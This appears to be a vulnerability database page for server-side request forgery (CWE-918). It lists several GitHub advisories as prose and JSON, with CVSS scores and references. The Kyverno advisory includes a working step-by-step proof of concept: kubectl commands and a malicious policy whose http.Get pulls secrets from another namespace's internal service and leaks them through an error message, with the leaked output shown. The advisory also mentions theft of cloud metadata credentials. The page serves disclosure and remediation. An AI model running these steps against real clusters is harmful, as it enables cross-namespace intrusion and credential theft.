CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4628 vulnerabilities reference this CWE, most recent first.
GHSA-RG43-2QFX-HV4G
Vulnerability from github – Published: 2022-05-14 03:38 – Updated: 2022-05-14 03:38GroupViewProxyServlet in RoomWizard before 4.4.x allows SSRF via the url parameter.
{
"affected": [],
"aliases": [
"CVE-2018-7055"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-15T10:29:00Z",
"severity": "HIGH"
},
"details": "GroupViewProxyServlet in RoomWizard before 4.4.x allows SSRF via the url parameter.",
"id": "GHSA-rg43-2qfx-hv4g",
"modified": "2022-05-14T03:38:49Z",
"published": "2022-05-14T03:38:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7055"
},
{
"type": "WEB",
"url": "http://misteralfa-hack.blogspot.cl/2018/02/steelcase-sala-por-favor-y-todos-tus.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RG64-8MRM-6X23
Vulnerability from github – Published: 2026-02-16 15:32 – Updated: 2026-02-16 15:32A flaw has been found in GeekAI up to 4.2.4. The affected element is the function Download of the file api/handler/net_handler.go. This manipulation of the argument url causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-2558"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-16T14:16:18Z",
"severity": "MODERATE"
},
"details": "A flaw has been found in GeekAI up to 4.2.4. The affected element is the function Download of the file api/handler/net_handler.go. This manipulation of the argument url causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-rg64-8mrm-6x23",
"modified": "2026-02-16T15:32:47Z",
"published": "2026-02-16T15:32:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2558"
},
{
"type": "WEB",
"url": "https://github.com/yangjian102621/geekai/issues/256"
},
{
"type": "WEB",
"url": "https://github.com/yangjian102621/geekai/issues/256#issue-3888814886"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.346166"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.346166"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.750730"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RG6M-2R9V-C5FJ
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2025-10-22 00:32The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
{
"affected": [],
"aliases": [
"CVE-2021-21985"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-26T15:15:00Z",
"severity": "CRITICAL"
},
"details": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.",
"id": "GHSA-rg6m-2r9v-c5fj",
"modified": "2025-10-22T00:32:13Z",
"published": "2022-05-24T19:03:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21985"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21985"
},
{
"type": "WEB",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0010.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/162812/VMware-Security-Advisory-2021-0010.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/163487/VMware-vCenter-Server-Virtual-SAN-Health-Check-Remote-Code-Execution.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RG78-GCXQ-8369
Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2022-05-24 19:17Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sql() method.
{
"affected": [],
"aliases": [
"CVE-2020-21649"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-10-06T22:15:00Z",
"severity": "HIGH"
},
"details": "Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \\controller\\index.php, which can be exploited via the sql() method.",
"id": "GHSA-rg78-gcxq-8369",
"modified": "2022-05-24T19:17:00Z",
"published": "2022-05-24T19:17:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-21649"
},
{
"type": "WEB",
"url": "https://github.com/lolipop1234/XXD/issues/4"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RG7M-27F9-6XR8
Vulnerability from github – Published: 2025-07-04 03:30 – Updated: 2025-07-04 03:30The PayMaster for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.4.31 via the 'wp_ajax_paym_status' AJAX action This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
{
"affected": [],
"aliases": [
"CVE-2025-6729"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-04T03:15:22Z",
"severity": "MODERATE"
},
"details": "The PayMaster for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.4.31 via the \u0027wp_ajax_paym_status\u0027 AJAX action This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
"id": "GHSA-rg7m-27f9-6xr8",
"modified": "2025-07-04T03:30:32Z",
"published": "2025-07-04T03:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6729"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/woocommerce-paymaster-gateway-019"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b9b501e-2ce7-43d8-bad2-6c3176eed8e2?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RG9M-JXJW-MQJ6
Vulnerability from github – Published: 2026-03-19 18:31 – Updated: 2026-03-24 03:31The backend database management connection test feature in wgcloud v3.6.3 has a server-side request forgery (SSRF) vulnerability. This issue can be exploited to make the server send requests to probe the internal network, remotely download malicious files, and perform other dangerous operations.
{
"affected": [],
"aliases": [
"CVE-2026-30404"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-19T16:16:02Z",
"severity": "HIGH"
},
"details": "The backend database management connection test feature in wgcloud v3.6.3 has a server-side request forgery (SSRF) vulnerability. This issue can be exploited to make the server send requests to probe the internal network, remotely download malicious files, and perform other dangerous operations.",
"id": "GHSA-rg9m-jxjw-mqj6",
"modified": "2026-03-24T03:31:19Z",
"published": "2026-03-19T18:31:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30404"
},
{
"type": "WEB",
"url": "https://github.com/TTTlw1024/qwe/issues/3"
},
{
"type": "WEB",
"url": "https://github.com/tianshiyeben/wgcloud/issues/98"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RGCC-VXWC-JXF9
Vulnerability from github – Published: 2026-04-20 12:32 – Updated: 2026-04-20 12:32A security vulnerability has been detected in moxi624 Mogu Blog v2 up to 5.2. Affected by this vulnerability is the function LocalFileServiceImpl.uploadPictureByUrl of the file mogu_picture/src/main/java/com/moxi/mogublog/picture/service/impl/LocalFileServiceImpl.java of the component Picture Storage Service. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-6625"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-20T10:16:17Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been detected in moxi624 Mogu Blog v2 up to 5.2. Affected by this vulnerability is the function LocalFileServiceImpl.uploadPictureByUrl of the file mogu_picture/src/main/java/com/moxi/mogublog/picture/service/impl/LocalFileServiceImpl.java of the component Picture Storage Service. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-rgcc-vxwc-jxf9",
"modified": "2026-04-20T12:32:01Z",
"published": "2026-04-20T12:32:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6625"
},
{
"type": "WEB",
"url": "https://github.com/ccccccctiiiiiiii-lab/public_exp/issues/3"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/792417"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/358260"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/358260/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RGGM-JJMC-3394
Vulnerability from github – Published: 2026-04-14 22:37 – Updated: 2026-04-14 22:37Summary
A Server-Side Request Forgery (SSRF) vulnerability in Kyverno's CEL HTTP library (pkg/cel/libs/http/) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.
Affected Versions
- Kyverno >= 1.16.0 (with
policies.kyverno.ioCRDs enabled, which is the default) - Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)
Details
The http.Get() and http.Post() functions available in CEL-based policies (policies.kyverno.io API group) do not enforce any URL restrictions. Unlike resource.Lib which enforces namespace boundaries for namespaced policies, the http.Lib allows unrestricted access to any URL.
Vulnerable Code: pkg/cel/libs/http/http.go
func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
req, err := http.NewRequestWithContext(context.TODO(), "GET", url, nil)
// NO URL VALIDATION - no blocklist, no namespace restrictions
...
}
Contrast with resource.Lib which enforces namespace:
// pkg/cel/libs/resource/lib.go
func Lib(namespace string, v *version.Version) cel.EnvOption {
return cel.Lib(&lib{namespace: namespace, version: v}) // Namespace enforced
}
This is a different code path from previously reported issues:
- GHSA-8p9x-46gm-qfx2: pkg/engine/apicall/apiCall.go (URLPath) - Fixed
- GHSA-459x-q9hg-4gpq: pkg/engine/apicall/executor.go (Service.URL) - Different feature (apiCall vs CEL http)
- This issue: pkg/cel/libs/http/http.go (CEL http.Get/http.Post) - Not fixed
PoC
Tested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).
A complete automated PoC script is attached. Manual steps below:
1. Setup attacker with namespace-scoped permissions
kubectl create namespace attacker-ns
kubectl create serviceaccount namespace-admin -n attacker-ns
cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: namespace-admin-role
namespace: attacker-ns
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create", "get", "list"]
- apiGroups: ["policies.kyverno.io"]
resources: ["namespacedvalidatingpolicies"]
verbs: ["create", "get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: namespace-admin-binding
namespace: attacker-ns
subjects:
- kind: ServiceAccount
name: namespace-admin
namespace: attacker-ns
roleRef:
kind: Role
name: namespace-admin-role
apiGroup: rbac.authorization.k8s.io
EOF
2. Create sensitive internal service (simulating internal API or cloud metadata)
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: internal-api
namespace: kube-system
labels:
app: internal-api
spec:
containers:
- name: server
image: hashicorp/http-echo
args:
- "-text={\"secret\": \"STOLEN_INTERNAL_SECRET_12345\", \"token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\"}"
- "-listen=:8080"
---
apiVersion: v1
kind: Service
metadata:
name: internal-api
namespace: kube-system
spec:
selector:
app: internal-api
ports:
- port: 80
targetPort: 8080
EOF
3. Verify attacker cannot access kube-system directly
kubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin
# Output: no
4. Create malicious NamespacedValidatingPolicy (as attacker)
cat <<EOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -
apiVersion: policies.kyverno.io/v1beta1
kind: NamespacedValidatingPolicy
metadata:
name: cel-ssrf-poc
namespace: attacker-ns
spec:
matchConstraints:
resourceRules:
- apiGroups: [""]
apiVersions: ["v1"]
operations: ["CREATE"]
resources: ["configmaps"]
variables:
- name: stolenData
expression: |
http.Get('http://internal-api.kube-system.svc.cluster.local')
validations:
- expression: "false"
message: "Validation failed"
messageExpression: |
'SSRF_LEAKED: secret=' + variables.stolenData['secret'] + ' token=' + variables.stolenData['token']
EOF
5. Trigger exploit and exfiltrate data
kubectl create configmap trigger --from-literal=x=y -n attacker-ns \
--as=system:serviceaccount:attacker-ns:namespace-admin
6. Result - Secret data exfiltrated
error: failed to create configmap: admission webhook "nvpol.validate.kyverno.svc-fail"
denied the request: Policy cel-ssrf-poc failed:
SSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Impact
- Cross-namespace data access: Users with only namespace-scoped permissions can access services in any namespace
- Cloud credential theft: Access to
http://169.254.169.254/...allows stealing AWS/GCP/Azure IAM credentials - Data exfiltration: HTTP response data exposed via validation error messages or audit annotations
- Breaks namespace isolation: Inconsistent with Kyverno's security model where
resource.Libenforces namespace boundaries
Affected Policies
All CEL-based namespaced policies in policies.kyverno.io API group:
- NamespacedValidatingPolicy
- NamespacedMutatingPolicy
- NamespacedDeletingPolicy
- NamespacedImageValidatingPolicy
Suggested Fix
Add namespace and URL restrictions to pkg/cel/libs/http/http.go, similar to how resource.Lib enforces namespace boundaries:
type lib struct {
namespace string // Add namespace parameter
version *version.Version
}
func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
if err := r.validateURL(url); err != nil {
return nil, fmt.Errorf("blocked URL: %w", err)
}
// ... existing code
}
func (r *contextImpl) validateURL(urlStr string) error {
// Block cloud metadata (169.254.0.0/16)
// Block localhost/loopback (127.0.0.0/8)
// For namespaced policies: restrict to same namespace services only
}
Attached kyverno-cel-ssrf-poc.sh
Credit
Discovered by: Igor Stepansky Organization: Orca Security Email: igor.stepansky@orca.security Personal Email: stepanskyigor@gmail.com
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/kyverno/kyverno"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0"
},
{
"fixed": "1.17.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-4789"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T22:37:20Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Kyverno\u0027s CEL HTTP library (`pkg/cel/libs/http/`) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.\n\n## Affected Versions\n\n- Kyverno \u003e= 1.16.0 (with `policies.kyverno.io` CRDs enabled, which is the default)\n- Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)\n\n## Details\n\nThe `http.Get()` and `http.Post()` functions available in CEL-based policies (`policies.kyverno.io` API group) do not enforce any URL restrictions. Unlike `resource.Lib` which enforces namespace boundaries for namespaced policies, the `http.Lib` allows unrestricted access to any URL.\n\n**Vulnerable Code:** `pkg/cel/libs/http/http.go`\n```go\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n req, err := http.NewRequestWithContext(context.TODO(), \"GET\", url, nil)\n // NO URL VALIDATION - no blocklist, no namespace restrictions\n ...\n}\n```\n\n**Contrast with resource.Lib** which enforces namespace:\n```go\n// pkg/cel/libs/resource/lib.go\nfunc Lib(namespace string, v *version.Version) cel.EnvOption {\n return cel.Lib(\u0026lib{namespace: namespace, version: v}) // Namespace enforced\n}\n```\n\nThis is a **different code path** from previously reported issues:\n- GHSA-8p9x-46gm-qfx2: `pkg/engine/apicall/apiCall.go` (URLPath) - Fixed\n- GHSA-459x-q9hg-4gpq: `pkg/engine/apicall/executor.go` (Service.URL) - Different feature (apiCall vs CEL http)\n- **This issue**: `pkg/cel/libs/http/http.go` (CEL http.Get/http.Post) - **Not fixed**\n\n## PoC\n\nTested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).\n\nA complete automated PoC script is attached. Manual steps below:\n\n### 1. Setup attacker with namespace-scoped permissions\n```bash\nkubectl create namespace attacker-ns\nkubectl create serviceaccount namespace-admin -n attacker-ns\n\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: namespace-admin-role\n namespace: attacker-ns\nrules:\n - apiGroups: [\"\"]\n resources: [\"configmaps\"]\n verbs: [\"create\", \"get\", \"list\"]\n - apiGroups: [\"policies.kyverno.io\"]\n resources: [\"namespacedvalidatingpolicies\"]\n verbs: [\"create\", \"get\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: namespace-admin-binding\n namespace: attacker-ns\nsubjects:\n - kind: ServiceAccount\n name: namespace-admin\n namespace: attacker-ns\nroleRef:\n kind: Role\n name: namespace-admin-role\n apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### 2. Create sensitive internal service (simulating internal API or cloud metadata)\n```bash\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n name: internal-api\n namespace: kube-system\n labels:\n app: internal-api\nspec:\n containers:\n - name: server\n image: hashicorp/http-echo\n args:\n - \"-text={\\\"secret\\\": \\\"STOLEN_INTERNAL_SECRET_12345\\\", \\\"token\\\": \\\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\\\"}\"\n - \"-listen=:8080\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: internal-api\n namespace: kube-system\nspec:\n selector:\n app: internal-api\n ports:\n - port: 80\n targetPort: 8080\nEOF\n```\n\n### 3. Verify attacker cannot access kube-system directly\n```bash\nkubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin\n# Output: no\n```\n\n### 4. Create malicious NamespacedValidatingPolicy (as attacker)\n```bash\ncat \u003c\u003cEOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -\napiVersion: policies.kyverno.io/v1beta1\nkind: NamespacedValidatingPolicy\nmetadata:\n name: cel-ssrf-poc\n namespace: attacker-ns\nspec:\n matchConstraints:\n resourceRules:\n - apiGroups: [\"\"]\n apiVersions: [\"v1\"]\n operations: [\"CREATE\"]\n resources: [\"configmaps\"]\n variables:\n - name: stolenData\n expression: |\n http.Get(\u0027http://internal-api.kube-system.svc.cluster.local\u0027)\n validations:\n - expression: \"false\"\n message: \"Validation failed\"\n messageExpression: |\n \u0027SSRF_LEAKED: secret=\u0027 + variables.stolenData[\u0027secret\u0027] + \u0027 token=\u0027 + variables.stolenData[\u0027token\u0027]\nEOF\n```\n\n### 5. Trigger exploit and exfiltrate data\n```bash\nkubectl create configmap trigger --from-literal=x=y -n attacker-ns \\\n --as=system:serviceaccount:attacker-ns:namespace-admin\n```\n\n### 6. Result - Secret data exfiltrated\n```\nerror: failed to create configmap: admission webhook \"nvpol.validate.kyverno.svc-fail\" \ndenied the request: Policy cel-ssrf-poc failed: \nSSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\n```\n\n## Impact\n\n1. **Cross-namespace data access**: Users with only namespace-scoped permissions can access services in any namespace\n2. **Cloud credential theft**: Access to `http://169.254.169.254/...` allows stealing AWS/GCP/Azure IAM credentials\n3. **Data exfiltration**: HTTP response data exposed via validation error messages or audit annotations\n4. **Breaks namespace isolation**: Inconsistent with Kyverno\u0027s security model where `resource.Lib` enforces namespace boundaries\n\n## Affected Policies\n\nAll CEL-based namespaced policies in `policies.kyverno.io` API group:\n- `NamespacedValidatingPolicy`\n- `NamespacedMutatingPolicy` \n- `NamespacedDeletingPolicy`\n- `NamespacedImageValidatingPolicy`\n\n## Suggested Fix\n\nAdd namespace and URL restrictions to `pkg/cel/libs/http/http.go`, similar to how `resource.Lib` enforces namespace boundaries:\n```go\ntype lib struct {\n namespace string // Add namespace parameter\n version *version.Version\n}\n\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n if err := r.validateURL(url); err != nil {\n return nil, fmt.Errorf(\"blocked URL: %w\", err)\n }\n // ... existing code\n}\n\nfunc (r *contextImpl) validateURL(urlStr string) error {\n // Block cloud metadata (169.254.0.0/16)\n // Block localhost/loopback (127.0.0.0/8)\n // For namespaced policies: restrict to same namespace services only\n}\n```\n\nAttached \n[kyverno-cel-ssrf-poc.sh](https://github.com/user-attachments/files/24940825/kyverno-cel-ssrf-poc.sh)\n\n\n## Credit\n\nDiscovered by: Igor Stepansky\nOrganization: Orca Security\nEmail: igor.stepansky@orca.security\nPersonal Email: stepanskyigor@gmail.com",
"id": "GHSA-rggm-jjmc-3394",
"modified": "2026-04-14T22:37:20Z",
"published": "2026-04-14T22:37:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-rggm-jjmc-3394"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
},
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/pull/15729"
},
{
"type": "PACKAGE",
"url": "https://github.com/kyverno/kyverno"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/655822"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access"
}
GHSA-RGHF-WR3J-2757
Vulnerability from github – Published: 2022-05-14 01:57 – Updated: 2022-05-14 01:57Rollup 18 for Microsoft Exchange Server 2010 SP3 and previous versions has an SSRF vulnerability via the username parameter in /owa/auth/logon.aspx in the OWA (Outlook Web Access) login page.
{
"affected": [],
"aliases": [
"CVE-2018-16793"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-21T16:29:00Z",
"severity": "HIGH"
},
"details": "Rollup 18 for Microsoft Exchange Server 2010 SP3 and previous versions has an SSRF vulnerability via the username parameter in /owa/auth/logon.aspx in the OWA (Outlook Web Access) login page.",
"id": "GHSA-rghf-wr3j-2757",
"modified": "2022-05-14T01:57:32Z",
"published": "2022-05-14T01:57:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16793"
},
{
"type": "WEB",
"url": "https://seclists.org/bugtraq/2018/Sep/38"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/149411/Rollup-18-For-Microsoft-Exchange-Server-2010-SP3-Server-Side-Request-Forgery.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2018/Sep/20"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105386"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RGVV-MQ36-9QV7
Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-26 21:30A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover.
{
"affected": [],
"aliases": [
"CVE-2025-56589"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-22T17:15:58Z",
"severity": "HIGH"
},
"details": "A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover.",
"id": "GHSA-rgvv-mq36-9qv7",
"modified": "2026-01-26T21:30:32Z",
"published": "2026-01-22T18:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-56589"
},
{
"type": "WEB",
"url": "https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi"
},
{
"type": "WEB",
"url": "http://apryse.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.